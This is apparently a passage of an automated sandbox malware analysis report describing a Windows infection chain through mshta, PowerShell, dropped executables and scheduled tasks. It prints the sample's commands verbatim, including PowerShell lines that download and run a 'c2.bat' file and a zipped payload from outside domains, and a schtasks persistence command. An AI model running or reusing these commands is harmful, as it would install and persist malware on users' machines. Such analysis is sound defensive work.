Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: wldp.dll

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$u='https://candwfarmsllc.com/c2.bat';$o=$env:TEMP + '\c2.bat';Invoke-WebRequest -Uri $u -OutFile $o;Start-Process -FilePath $o -NoNewWindow"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$u='https://candwfarmsllc.com/c2.bat';$o=$env:TEMP + '\c2.bat';Invoke-WebRequest -Uri $u -OutFile $o;Start-Process -FilePath $o -NoNewWindow"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 16_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

16_2_004062FC

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_046036D7 push ebx; iretd	2_2_046036DA
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00DF0DE6 push ecx; ret	36_2_00DF0DF9
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A30DE6 push ecx; ret	38_2_00A30DF9

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	File created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com			Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	File created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E626DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	36_2_00E626DD
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00DEFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	36_2_00DEFC7C
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00AA26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	38_2_00AA26DD
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A2FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	38_2_00A2FC7C

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
